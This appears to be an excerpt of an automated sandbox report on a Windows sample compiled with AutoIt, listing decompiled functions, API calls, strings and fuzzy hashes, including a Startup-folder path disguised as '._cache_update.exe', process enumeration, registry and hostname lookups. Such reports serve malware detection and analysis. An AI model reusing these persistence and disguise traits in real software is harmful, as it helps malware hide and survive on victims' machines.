                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                                                          • String ID: SCRIPT
                                                                                                                                                          • API String ID: 3051347437-3967369404
                                                                                                                                                          • Opcode ID: 14ae0776be1793662d779d1127a02375028cd10c3258423fee44f0b1ee329275
                                                                                                                                                          • Instruction ID: 73539e9543abcb2eccfca91484fab7126331b470ebcd45f298f87e87f134a7e2
                                                                                                                                                          • Opcode Fuzzy Hash: 14ae0776be1793662d779d1127a02375028cd10c3258423fee44f0b1ee329275
                                                                                                                                                          • Instruction Fuzzy Hash: 4D117C75200B01BFE7218B65FC48F677BB9EBCAB41F108029F41296950DB71DD50CA70
                                                                                                                                                          APIs
                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00166F7D
                                                                                                                                                          • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00166F8D
                                                                                                                                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 00166FAC
                                                                                                                                                          • __wsplitpath.LIBCMT ref: 00166FD0
                                                                                                                                                          • _wcscat.LIBCMT ref: 00166FE3
                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00167022
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1605983538-0
                                                                                                                                                          • Opcode ID: 288371fb0e877c3abe508ff403a4f5ec5aeefd744046b888e95fb9e79ec05f0f
                                                                                                                                                          • Instruction ID: 676aa0b77cdd578f1687737947e7076985137d91e1441d26653f118fcd6c2dce
                                                                                                                                                          • Opcode Fuzzy Hash: 288371fb0e877c3abe508ff403a4f5ec5aeefd744046b888e95fb9e79ec05f0f
                                                                                                                                                          • Instruction Fuzzy Hash: E6218771904218ABDB11EBA0DC88BEEB7BCAB59304F1004E9F545D3141E7759FD4CB60
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 001678AD: GetFullPathNameW.KERNEL32(?,00000105,?,?), ref: 001678CB
                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 0016F04D
                                                                                                                                                          • CoCreateInstance.COMBASE(001ADA7C,00000000,00000001,001AD8EC,?), ref: 0016F066
                                                                                                                                                          • CoUninitialize.COMBASE ref: 0016F083
                                                                                                                                                            • Part of subcall function 001284A6: __swprintf.LIBCMT ref: 001284E5
                                                                                                                                                            • Part of subcall function 001284A6: __itow.LIBCMT ref: 00128519
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                                                                                          • String ID: .lnk
                                                                                                                                                          • API String ID: 2126378814-24824748
                                                                                                                                                          • Opcode ID: 183e870371113429f3b5f4478f43fa36e7c78e6dbfbb2250b6ccca8495df855f
                                                                                                                                                          • Instruction ID: 71e417305b407c2db0be8b363e16c75038833c2fc4551409642f8de15d0c5037
                                                                                                                                                          • Opcode Fuzzy Hash: 183e870371113429f3b5f4478f43fa36e7c78e6dbfbb2250b6ccca8495df855f
                                                                                                                                                          • Instruction Fuzzy Hash: 3AA146756043019FC710EF14D894E5ABBE5BF89320F14895DF89A9B3A2CB31ED46CB91
                                                                                                                                                          APIs
                                                                                                                                                          • GetFileAttributesW.KERNEL32(0012C848,0012C848), ref: 0013DDA2
                                                                                                                                                          • FindFirstFileW.KERNEL32(0012C848,?), ref: 00194A83
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: File$AttributesFindFirst
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4185537391-0
                                                                                                                                                          • Opcode ID: 7ea752aafe68efc43ff52c8c6a01e5cdce1bddae24483b0721db0c0ce9f52124
                                                                                                                                                          • Instruction ID: a2a5b7fadae13088d6639666f9f1b26d121938d313472c1700d121a965cd3f6d
                                                                                                                                                          • Opcode Fuzzy Hash: 7ea752aafe68efc43ff52c8c6a01e5cdce1bddae24483b0721db0c0ce9f52124
                                                                                                                                                          • Instruction Fuzzy Hash: D7E0D8314148015786186778FC0D8F9375C9B06338F100745F837C28E0EB709D8586D6
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 6f2c8244d9398502ad2d6c1baf7fdec2d042526fcbea76d346ae1de3fdc98440
                                                                                                                                                          • Instruction ID: d7e7034059e46f272dd59bbe616891796f567cd5e4c8d3fc580b913b22eda254
                                                                                                                                                          • Opcode Fuzzy Hash: 6f2c8244d9398502ad2d6c1baf7fdec2d042526fcbea76d346ae1de3fdc98440
                                                                                                                                                          • Instruction Fuzzy Hash: F522B070A00229DFDB14DF58E490ABAF7F0FF19300F158069E9469B391E774ADA6CB91
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: BuffCharUpper
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3964851224-0
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: NameUser
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2645101109-0
                                                                                                                                                          APIs
                                                                                                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0012E279
                                                                                                                                                          • timeGetTime.WINMM ref: 0012E51A
                                                                                                                                                          • TranslateMessage.USER32(?), ref: 0012E646
                                                                                                                                                          • DispatchMessageW.USER32(?), ref: 0012E651
                                                                                                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0012E664
                                                                                                                                                          • LockWindowUpdate.USER32(00000000), ref: 0012E697
                                                                                                                                                          • DestroyWindow.USER32 ref: 0012E6A3
                                                                                                                                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0012E6BD
                                                                                                                                                          • Sleep.KERNEL32(0000000A), ref: 00195B15
                                                                                                                                                          • TranslateMessage.USER32(?), ref: 001962AF
                                                                                                                                                          • DispatchMessageW.USER32(?), ref: 001962BD
                                                                                                                                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 001962D1
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                                                                                                                          • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                                                                                                          • API String ID: 2641332412-570651680
                                                                                                                                                          APIs
                                                                                                                                                          • ___createFile.LIBCMT ref: 00156C73
                                                                                                                                                          • ___createFile.LIBCMT ref: 00156CB4
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00156CDD
                                                                                                                                                          • __dosmaperr.LIBCMT ref: 00156CE4
                                                                                                                                                          • GetFileType.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00156CF7
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00156D1A
                                                                                                                                                          • __dosmaperr.LIBCMT ref: 00156D23
                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00156D2C
                                                                                                                                                          • __set_osfhnd.LIBCMT ref: 00156D5C
                                                                                                                                                          • __lseeki64_nolock.LIBCMT ref: 00156DC6
                                                                                                                                                          • __close_nolock.LIBCMT ref: 00156DEC
                                                                                                                                                          • __chsize_nolock.LIBCMT ref: 00156E1C
                                                                                                                                                          • __lseeki64_nolock.LIBCMT ref: 00156E2E
                                                                                                                                                          • __lseeki64_nolock.LIBCMT ref: 00156F26
                                                                                                                                                          • __lseeki64_nolock.LIBCMT ref: 00156F3B
                                                                                                                                                          • __close_nolock.LIBCMT ref: 00156F9B
                                                                                                                                                            • Part of subcall function 0014F84C: CloseHandle.KERNEL32(00000000,001CEEC4,00000000,?,00156DF1,001CEEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0014F89C
                                                                                                                                                            • Part of subcall function 0014F84C: GetLastError.KERNEL32(?,00156DF1,001CEEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0014F8A6
                                                                                                                                                            • Part of subcall function 0014F84C: __free_osfhnd.LIBCMT ref: 0014F8B3
                                                                                                                                                            • Part of subcall function 0014F84C: __dosmaperr.LIBCMT ref: 0014F8D5
                                                                                                                                                            • Part of subcall function 0014889E: __getptd_noexit.LIBCMT ref: 0014889E
                                                                                                                                                          • __lseeki64_nolock.LIBCMT ref: 00156FBD
                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 001570F2
                                                                                                                                                          • ___createFile.LIBCMT ref: 00157111
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0015711E
                                                                                                                                                          • __dosmaperr.LIBCMT ref: 00157125
                                                                                                                                                          • __free_osfhnd.LIBCMT ref: 00157145
                                                                                                                                                          • __invoke_watson.LIBCMT ref: 00157173
                                                                                                                                                          • __wsopen_helper.LIBCMT ref: 0015718D
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                                                                                                                          • String ID: @
                                                                                                                                                          • API String ID: 3896587723-2766056989

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          • GetFileVersionInfoSizeW.KERNELBASE(?,?), ref: 001676ED
                                                                                                                                                          • GetFileVersionInfoW.KERNELBASE(?,00000000,00000000,00000000,?,?), ref: 00167713
                                                                                                                                                          • _wcscpy.LIBCMT ref: 00167741
                                                                                                                                                          • _wcscmp.LIBCMT ref: 0016774C
                                                                                                                                                          • _wcscat.LIBCMT ref: 00167762
                                                                                                                                                          • _wcsstr.LIBCMT ref: 0016776D
                                                                                                                                                          • 755A1560.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00167789
                                                                                                                                                          • _wcscat.LIBCMT ref: 001677D2
                                                                                                                                                          • _wcscat.LIBCMT ref: 001677D9
                                                                                                                                                          • _wcsncpy.LIBCMT ref: 00167804
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _wcscat$FileInfoVersion$A1560Size_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                                                                                          • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                                          • API String ID: 1513093770-1459072770
                                                                                                                                                          • Opcode ID: d28dc1fca4fa415569d9d3c53b21335f2144f06798292d60eed9e26cc1f302c7
                                                                                                                                                          • Instruction ID: 8857ce8ce07576addc1ea652568537f16a8704df5af61b722d90ba1b235894cf
                                                                                                                                                          • Opcode Fuzzy Hash: d28dc1fca4fa415569d9d3c53b21335f2144f06798292d60eed9e26cc1f302c7
                                                                                                                                                          • Instruction Fuzzy Hash: 4041D471A042007AE705AB64DC87EBF77ACDF65724F50006AF901A71A2FB74DA5186A1

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 00127E53: _memmove.LIBCMT ref: 00127EB9
                                                                                                                                                          • GetForegroundWindow.USER32 ref: 00121FBE
                                                                                                                                                          • IsWindow.USER32(?), ref: 0019282E
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Window$Foreground_memmove
                                                                                                                                                          • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                                                                                                          • API String ID: 3828923867-1919597938
                                                                                                                                                          • Opcode ID: 07e1df4bf572ac0f94dc2808b03dd77f9d3e39ea0c0478a766cd14a8f658c9b0
                                                                                                                                                          • Instruction ID: ebac92b640f0d05844c8c78b5f0e00913e2f54d36153fe58b8760700e5fd0ddb
                                                                                                                                                          • Opcode Fuzzy Hash: 07e1df4bf572ac0f94dc2808b03dd77f9d3e39ea0c0478a766cd14a8f658c9b0
                                                                                                                                                          • Instruction Fuzzy Hash: 6FD1E930504602FBCF0CEF20D581AA9BBE5BF74344F144A2DF456575A1DB30E9AACB92

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe,00000104,?,00000000,00000001,00000000), ref: 0012428C
                                                                                                                                                            • Part of subcall function 0012CAEE: _memmove.LIBCMT ref: 0012CB2F
                                                                                                                                                            • Part of subcall function 00141BC7: __wcsicmp_l.LIBCMT ref: 00141C50
                                                                                                                                                          • _wcscpy.LIBCMT ref: 001243C0
                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe,00000104,?,?,?,?,00000000,CMDLINE,?,?,00000100,00000000,CMDLINE,?,?), ref: 0019214E
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FileModuleName$__wcsicmp_l_memmove_wcscpy
                                                                                                                                                          • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe$CMDLINE$CMDLINERAW
                                                                                                                                                          • API String ID: 861526374-1399560292
                                                                                                                                                          • Opcode ID: da5cf19370c918b24b1b7867aebf94059aa81451be65d869e344093eda10af4a
                                                                                                                                                          • Instruction ID: 58ba8da17bd11a5e44cb4cf18705d453216c521e8ced1836a48e8c8c6ea84f85
                                                                                                                                                          • Opcode Fuzzy Hash: da5cf19370c918b24b1b7867aebf94059aa81451be65d869e344093eda10af4a
                                                                                                                                                          • Instruction Fuzzy Hash: 09816172900169ABCB09EBE0ED92EEF77B8EF25350F510029F541B7091EB706B54CBA1

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                                          • String ID: 0.0.0.0
                                                                                                                                                          • API String ID: 208665112-3771769585
                                                                                                                                                          • Opcode ID: 51475b895b879711bfc2623b2a261d892b37ca381cb8fd05266104e45fde215c
                                                                                                                                                          • Instruction ID: f3ce19ed06b5ae5f30eff8e604f0319a4a791ed0669185a97130e35e34bb9a9a
                                                                                                                                                          • Opcode Fuzzy Hash: 51475b895b879711bfc2623b2a261d892b37ca381cb8fd05266104e45fde215c
                                                                                                                                                          • Instruction Fuzzy Hash: 8F11B471908115ABDB28A770EC4AEEA77BCDF5673CF0001A5F456960E1EF70DAC186A0

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0013EA39
                                                                                                                                                          • __wsplitpath.LIBCMT ref: 0013EA56
                                                                                                                                                            • Part of subcall function 0014297D: __wsplitpath_helper.LIBCMT ref: 001429BD
                                                                                                                                                          • _wcsncat.LIBCMT ref: 0013EA69
                                                                                                                                                          • __makepath.LIBCMT ref: 0013EA85
                                                                                                                                                            • Part of subcall function 00142BFF: __wmakepath_s.LIBCMT ref: 00142C13
                                                                                                                                                            • Part of subcall function 0014010A: std::exception::exception.LIBCMT ref: 0014013E
                                                                                                                                                            • Part of subcall function 0014010A: __CxxThrowException@8.LIBCMT ref: 00140153
                                                                                                                                                          • _wcscpy.LIBCMT ref: 0013EABE
                                                                                                                                                            • Part of subcall function 0013EB05: RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,0013EADA,?,?), ref: 0013EB27
                                                                                                                                                          • _wcscat.LIBCMT ref: 001932FC
                                                                                                                                                          • _wcscat.LIBCMT ref: 00193334
                                                                                                                                                          • _wcsncpy.LIBCMT ref: 00193370
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _wcscat$Exception@8FileModuleNameOpenThrow__makepath__wmakepath_s__wsplitpath__wsplitpath_helper_wcscpy_wcsncat_wcsncpystd::exception::exception
                                                                                                                                                          • String ID: Include$\
                                                                                                                                                          • API String ID: 1213536620-3429789819
                                                                                                                                                          • Opcode ID: 324c5af4c6416bde9b335ae1d9e72f53d63cf4cd415eb4645b27b696fdfde321
                                                                                                                                                          • Instruction ID: ebfa4c8ff1bae6c10391760090b699b018147cc274aa0df0c60f9045dfe3eb2b
                                                                                                                                                          • Opcode Fuzzy Hash: 324c5af4c6416bde9b335ae1d9e72f53d63cf4cd415eb4645b27b696fdfde321
                                                                                                                                                          • Instruction Fuzzy Hash: D1519DB2404380ABC305EF95ECE5C9AB7ECFB5D300B80092EF5459B661EB749684CF66

                                                                                                                                                          APIs
                                                                                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00183626
                                                                                                                                                          • RegCreateKeyExW.KERNEL32(?,?,00000000,001BDBF0,00000000,?,00000000,?,?), ref: 00183694
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ConnectCreateRegistry
                                                                                                                                                          • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                                          • API String ID: 4192528855-966354055
                                                                                                                                                          • Opcode ID: f2ea38265b837c285221b0ffe9fbf74cc028a44cb55a4bac4be63ad42e8be951
                                                                                                                                                          • Instruction ID: 981ea8a635a80c6e1e1b600383e4cbc6846e43e82fc28f9e58bd454e353b44c1
                                                                                                                                                          • Opcode Fuzzy Hash: f2ea38265b837c285221b0ffe9fbf74cc028a44cb55a4bac4be63ad42e8be951
                                                                                                                                                          • Instruction Fuzzy Hash: E0027B752006119FCB14EF28D991E2AB7E5FF99720F04845DF89A9B3A2DB30EE51CB41

                                                                                                                                                          APIs
                                                                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 001230B0
                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 001230BF
                                                                                                                                                          • LoadIconW.USER32(00000063), ref: 001230D5
                                                                                                                                                          • LoadIconW.USER32(000000A4), ref: 001230E7
                                                                                                                                                          • LoadIconW.USER32(000000A2), ref: 001230F9
                                                                                                                                                            • Part of subcall function 0012318A: LoadImageW.USER32(00120000,00000063,00000001,00000010,00000010,00000000), ref: 001231AE
                                                                                                                                                          • RegisterClassExW.USER32(?), ref: 00123167
                                                                                                                                                            • Part of subcall function 00122F58: GetSysColorBrush.USER32(0000000F), ref: 00122F8B
                                                                                                                                                            • Part of subcall function 00122F58: RegisterClassExW.USER32(00000030), ref: 00122FB5
                                                                                                                                                            • Part of subcall function 00122F58: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00122FC6
                                                                                                                                                            • Part of subcall function 00122F58: LoadIconW.USER32(000000A9), ref: 00123009
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Load$Icon$Register$BrushClassColor$ClipboardCursorFormatImage
                                                                                                                                                          • String ID: #$0$AutoIt v3
                                                                                                                                                          • API String ID: 2880975755-4155596026
                                                                                                                                                          • Opcode ID: 05a0f3b92c5bb7400439d5c85f23843992736b699dd0d9837daf0af9789ad7c5
                                                                                                                                                          • Instruction ID: 7864c38c1583f34a9239ea421134a5e5ac3d3f62f9c83cfe9933cc51d7325a94
                                                                                                                                                          • Opcode Fuzzy Hash: 05a0f3b92c5bb7400439d5c85f23843992736b699dd0d9837daf0af9789ad7c5
                                                                                                                                                          • Instruction Fuzzy Hash: 77213CB4E00354BBDB04DFE9EC89A9DBBF5FB48314F00412AE615ABAA0D77545D08F91

                                                                                                                                                          APIs
                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 0017B777
                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 0017B7A4
                                                                                                                                                          • CoUninitialize.COMBASE ref: 0017B7AE
                                                                                                                                                          • GetRunningObjectTable.OLE32(00000000,?), ref: 0017B8AE
                                                                                                                                                          • SetErrorMode.KERNEL32(00000001,00000029), ref: 0017B9DB
                                                                                                                                                          • CoGetInstanceFromFile.COMBASE(00000000,?,00000000,00000015,00000002), ref: 0017BA0F
                                                                                                                                                          • CoGetObject.OLE32(?,00000000,001AD91C,?), ref: 0017BA32
                                                                                                                                                          • SetErrorMode.KERNEL32(00000000), ref: 0017BA45
                                                                                                                                                          • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0017BAC5
                                                                                                                                                          • VariantClear.OLEAUT32(001AD91C), ref: 0017BAD5
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2395222682-0
                                                                                                                                                          • Opcode ID: 761b12c2249203f13db1d2d4ef8f392443bfac2c2f55ae4d23ff520fb15f1432
                                                                                                                                                          • Instruction ID: ca0390ae0860964264553964f3fa65839ee0ced540715f8c5be083e0b825f401
                                                                                                                                                          • Opcode Fuzzy Hash: 761b12c2249203f13db1d2d4ef8f392443bfac2c2f55ae4d23ff520fb15f1432
                                                                                                                                                          • Instruction Fuzzy Hash: 29C114716083059FC704EF68C884A6BB7F9BF89308F00895DF59A9B251DB71ED45CB92

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 00122F8B
                                                                                                                                                          • RegisterClassExW.USER32(00000030), ref: 00122FB5
                                                                                                                                                          • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00122FC6
                                                                                                                                                          • LoadIconW.USER32(000000A9), ref: 00123009
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Register$BrushClassClipboardColorFormatIconLoad
                                                                                                                                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                          • API String ID: 975902462-1005189915
                                                                                                                                                          • Opcode ID: 639759bd4ef750f83f15235c5611b00a4eb6aee66f3fa4a3a42cdf55ed5ff252
                                                                                                                                                          • Instruction ID: 56c314da63169f01d4f39ad8da6ce285cb2b46463d3bdc227bcf6956083ec517
                                                                                                                                                          • Opcode Fuzzy Hash: 639759bd4ef750f83f15235c5611b00a4eb6aee66f3fa4a3a42cdf55ed5ff252
                                                                                                                                                          • Instruction Fuzzy Hash: DA21C4B5900358AFDB00DFE4E989BCEBBF4FB09704F00451AF616AAAA0D7B44584CF91

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
